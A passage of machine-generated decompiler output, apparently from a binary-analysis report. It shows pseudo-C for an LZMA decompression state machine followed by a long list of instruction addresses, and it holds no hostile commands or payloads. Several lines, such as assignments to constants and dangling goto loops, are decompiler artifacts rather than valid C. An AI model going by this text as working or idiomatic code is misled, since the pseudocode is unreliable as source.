												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                                                              0x00000000
                                                                                                                              0x0040643a
                                                                                                                              0x0040643a
                                                                                                                              0x0040643e
                                                                                                                              0x00406467
                                                                                                                              0x00406471
                                                                                                                              0x00406440
                                                                                                                              0x00406449
                                                                                                                              0x00406456
                                                                                                                              0x00406459
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x004067a0
                                                                                                                              0x004067a0
                                                                                                                              0x004067a0
                                                                                                                              0x004067a6
                                                                                                                              0x004067ac
                                                                                                                              0x004067b2
                                                                                                                              0x004067cc
                                                                                                                              0x004067cf
                                                                                                                              0x004067d5
                                                                                                                              0x004067e0
                                                                                                                              0x004067e2
                                                                                                                              0x004067b4
                                                                                                                              0x004067b4
                                                                                                                              0x004067c3
                                                                                                                              0x004067c7
                                                                                                                              0x004067c7
                                                                                                                              0x004067ec
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004067ee
                                                                                                                              0x004067f2
                                                                                                                              0x004069a1
                                                                                                                              0x004069b7
                                                                                                                              0x004069bf
                                                                                                                              0x004069c6
                                                                                                                              0x004069c8
                                                                                                                              0x004069cf
                                                                                                                              0x004069d3
                                                                                                                              0x004069d3
                                                                                                                              0x004067fe
                                                                                                                              0x00406805
                                                                                                                              0x0040680d
                                                                                                                              0x00406810
                                                                                                                              0x00406813
                                                                                                                              0x00406813
                                                                                                                              0x00406819
                                                                                                                              0x00406819
                                                                                                                              0x00405fb5
                                                                                                                              0x00405fb5
                                                                                                                              0x00405fb5
                                                                                                                              0x00405fbe
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fc4
                                                                                                                              0x00000000
                                                                                                                              0x00405fcf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fd8
                                                                                                                              0x00405fdb
                                                                                                                              0x00405fde
                                                                                                                              0x00405fe2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fe8
                                                                                                                              0x00405feb
                                                                                                                              0x00405fed
                                                                                                                              0x00405fee
                                                                                                                              0x00405ff1
                                                                                                                              0x00405ff3
                                                                                                                              0x00405ff4
                                                                                                                              0x00405ff6
                                                                                                                              0x00405ff9
                                                                                                                              0x00405ffe
                                                                                                                              0x00406003
                                                                                                                              0x0040600c
                                                                                                                              0x0040601f
                                                                                                                              0x00406022
                                                                                                                              0x0040602e
                                                                                                                              0x00406056
                                                                                                                              0x00406058
                                                                                                                              0x00406066
                                                                                                                              0x00406066
                                                                                                                              0x0040606a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040605a
                                                                                                                              0x0040605a
                                                                                                                              0x0040605d
                                                                                                                              0x0040605e
                                                                                                                              0x0040605e
                                                                                                                              0x00000000
                                                                                                                              0x0040605a
                                                                                                                              0x00406034
                                                                                                                              0x00406039
                                                                                                                              0x00406039
                                                                                                                              0x00406042
                                                                                                                              0x0040604a
                                                                                                                              0x0040604d
                                                                                                                              0x00000000
                                                                                                                              0x00406053
                                                                                                                              0x00406053
                                                                                                                              0x00000000
                                                                                                                              0x00406053
                                                                                                                              0x00000000
                                                                                                                              0x00406070
                                                                                                                              0x00406070
                                                                                                                              0x00406074
                                                                                                                              0x00406920
                                                                                                                              0x00000000
                                                                                                                              0x00406920
                                                                                                                              0x0040607d
                                                                                                                              0x0040608d
                                                                                                                              0x00406090
                                                                                                                              0x00406093
                                                                                                                              0x00406093
                                                                                                                              0x00406093
                                                                                                                              0x00406096
                                                                                                                              0x0040609a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040609c
                                                                                                                              0x004060a2
                                                                                                                              0x004060cc
                                                                                                                              0x004060d2
                                                                                                                              0x004060d9
                                                                                                                              0x00000000
                                                                                                                              0x004060d9
                                                                                                                              0x004060a8
                                                                                                                              0x004060ab
                                                                                                                              0x004060b0
                                                                                                                              0x004060b0
                                                                                                                              0x004060bb
                                                                                                                              0x004060c3
                                                                                                                              0x004060c6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040610b
                                                                                                                              0x00406111
                                                                                                                              0x00406114
                                                                                                                              0x00406121
                                                                                                                              0x00406129
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004060e0
                                                                                                                              0x004060e0
                                                                                                                              0x004060e4
                                                                                                                              0x0040692f
                                                                                                                              0x00000000
                                                                                                                              0x0040692f
                                                                                                                              0x004060f0
                                                                                                                              0x004060fb
                                                                                                                              0x004060fb
                                                                                                                              0x004060fb
                                                                                                                              0x004060fe
                                                                                                                              0x00406101
                                                                                                                              0x00406104
                                                                                                                              0x00406109
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004067a0
                                                                                                                              0x004067a0
                                                                                                                              0x004067a6
                                                                                                                              0x004067ac
                                                                                                                              0x004067b2
                                                                                                                              0x004067cc
                                                                                                                              0x004067cf
